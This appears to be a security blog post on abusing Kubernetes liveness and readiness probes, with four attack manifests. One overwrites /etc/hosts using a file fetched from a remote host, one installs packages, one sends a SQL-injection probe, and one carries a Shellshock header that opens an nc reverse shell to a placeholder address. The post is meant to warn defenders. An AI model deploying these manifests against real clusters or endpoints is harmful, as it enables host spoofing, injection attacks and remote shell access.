top of page

Exploiting applications using liveness probes in Kubernetes

Philippe Bogaerts

Updated: Feb 11, 2023



Introduction

Startup, readiness, and liveness probes are very well described in the Kubernetes documentation. kubelet uses these probes defined in the pod manifest to verify whether a pod is booting, ready to accept traffic and still alive. It is kubelet who actually executes the probes (and not the pod itself). There are different ways the probes are executed.

  • httpGet

  • exec

The problems described here are considered ‘as designed’, as you should download containers from a trusted source according to the reviewers.

The examples below shows that trusted sources of container images will not solve the problem, neither will image scanning. To prevent an attack from happening, it is mandatory to scan the Kubernetes pod and deployment manifests rigorously before deploying (and not use any pre-canned examples :-))


Examples


Example 1: Overwriting files on the pod filesystem. This code snippet overwrites the pods /etc/hostfile to spoof hostnames.



kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec15
spec:
  containers:
  - name: liveness
    image: xxradar/hackon
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      exec:
        command:
        - curl
        - www.xxxxx.com/host.txt
        - -o 
        - /etc/hosts
      initialDelaySeconds: 5
      periodSeconds: 5
EOF
      

Example 2: Installing applications in a pod at deployment time


kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-exec39
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    readinessProbe:
      exec:
        command:
        - apt-get 
        - update
      initialDelaySeconds: 5
      periodSeconds: 10
      timeoutSeconds: 60
    livenessProbe:
      exec:
        command:
        - apt-get 
        - install
        - -y
        - curl
      initialDelaySeconds: 60
      periodSeconds: 100
      timeoutSeconds: 60
EOF
      

Example 3: Attacking http(s) endpoints using sql injection, XXS, …


kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness3
spec:
  containers:
  - name: liveness
    image: ubuntu
    args:
    - /bin/sh
    - -c
    - touch /tmp/healthy;sleep 600
    livenessProbe:
      httpGet:
        host: www.xxxx.com
        path: /?'OR 1=1--
        port: 8080
        httpHeaders:
          - name: User-Agent
            value: xxxxxxxxx
EOF
           

Example 4 : Attacking http(s) endpoints using shellshock


apiVersion: v1
kind: Pod
metadata:
   name: radarhack-pod3
   labels:
      pod: radarhack
spec:
  containers:
  - name: radarhack
    image: docker.io/xxradar/naxsi5
    ports:
    - containerPort: 80
    livenessProbe:
      httpGet:
        host: www.xxxxx.com
        path: /index.html?test=' or 1=1--
        port: 8080
        httpHeaders:
        - name: Custom-Header
          value: Awesome
        - name: X-Frame-Options
          value: () { :;};echo;/bin/nc -e /bin/bash 1.1.x.x 443
      initialDelaySeconds: 3
      periodSeconds: 3
      

Conclusion


Many things are written on securely deploying applications on kubernetes. Keep in mind that all aspects need full attention and generating and building Kubernetes manifest is also developping code.

31 views0 comments

Recent Posts

See All

Comments


bottom of page